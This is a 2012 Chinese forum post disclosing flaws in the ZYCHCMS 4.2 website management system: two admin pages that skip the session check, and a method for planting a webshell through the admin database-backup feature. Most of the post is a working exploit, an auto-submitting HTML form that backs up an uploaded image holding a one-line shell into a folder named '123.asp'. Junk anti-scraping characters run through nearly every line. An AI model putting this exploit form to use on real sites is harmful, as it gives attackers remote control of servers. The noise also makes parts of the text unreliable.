. Z" s- r) H! n ^# q
, q# N p- |: T0 A$ q& K5 A5 K, u# O4 y: d
5 j, x, |! X" T1 P
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)& _: ?6 x, K; N4 b
①SQL注射漏洞& ^6 o1 }: [5 X/ F
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp" h! V8 Q/ b6 @* |& a+ E
漏洞原因:未过滤" [7 L/ n2 z7 O: Q' X* x7 u
漏洞代码:
* a, h3 Q, B: K6 Y! v 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。) q3 l2 P" \8 F- d$ K; y
修复方法:在文件开头加入代码4 d& h+ B* P) ^: h h; T
0 j, h2 B7 \, M+ q' { K) d* C# z( R6 F% p5 L; `" m2 Q
②后台拿WBSHELL
* n4 z& n0 U$ }& D J' l0 p& L; g C. l 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
( |5 C" x1 o# i+ l8 q/ [ 这里在网上找了一个,改了下,将就着用。6 `8 I; t2 W2 x$ I9 Y% B
以下是代码本地提交代码
9 ~2 U" C# }# f8 e9 U% ]" b/ S9 y
i( U2 n/ L5 x: R- {+ v7 l; Q8 t. h6 R; z9 N
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
5 c2 `% H) D" W* _, J! v' j0 n$ H4 N7 l <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
" P, [% G+ N- y+ z- |3 ?. m <tr> t* r/ B( d$ w2 _; t! b
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
2 D% v9 l* f8 G& `* B </tr>: @2 ?- S& l- \
<tr>$ l) B! T3 F! a9 \3 M5 i
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
% V0 @% s3 [( x6 _; G </span>
I/ l! B7 f7 u, r$ H4 @4 ? <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >7 l' p1 e$ e S
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ c0 C4 `7 f! {- M8 ] <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>* ?# Z' Z9 `+ _9 i( i0 z
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
: m: Q% v2 y: q3 l: z( } <div align=”left”>% k( j' }& M' G9 j5 R1 _
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />5 Z& P/ w$ c9 c
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>6 L7 X% l; f* p7 ^ ]* O
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” /> ]9 v6 g: z% D! p% q
</div></td>
2 x7 R# [" A; g </tr>
0 {1 L! w9 V! j* c& I& t- K <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>4 `5 y$ M: i3 l: J
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
8 P/ K) v! B. w- s: \$ w <td class=”td”><div align=”left”>
* r$ E* D8 t; t <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
$ D3 a9 D2 C* G1 } [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>% K8 Z7 s1 ?4 J8 l7 @3 X
</tr>
8 y: }2 D' j5 B1 A9 k% o. q& R <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
0 m1 F) T# w% N5 J; L' t <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
$ [7 I; q H p, F- S <td class=”td”><div align=”left”>
|8 x+ G0 t. @' G1 r <input type=”submit” value=”确定备份” class=”btn”
. Z0 h# z2 [/ |; F) j: H# K </div></td>
! s; D) n2 c1 p' ]4 A </tr>! h; a+ N; s; y0 u$ i( `4 e+ A
</table></td></tr></form>
) b) K1 t( |; h* q </table> p, W5 K/ X5 o4 e" q
</td>: u" F t$ a3 P7 \) j% X) Y
</tr>' s; F6 w* i$ n- J" [+ @
</table>
4 z* D4 ]7 w* {3 S% ~& h5 t; W <script> j6 J- t1 T5 |9 Y4 v1 G! {
document.all.add.submit();& R, a V5 r1 k5 A+ A6 b& r% b. V
</script>+ o; T" ]0 |2 f
5 i- k% E3 y& r2 |- q1 B/ E* M1 P. B- F9 e
( l* |6 j: |+ A3 v2 Y
* j2 u6 i; z; i
7 T8 H$ V1 [& M9 y' n+ x q, q: ]# ]* A' i
$ }+ K$ m- D P0 \5 ~
8 b4 z! y' B) v; @# R/ N8 @! c- X% W' Q; X
" D. ?" U8 q' a3 Y# p+ Z |
发表于 2012-9-10 21:09:51
收藏
支持
反对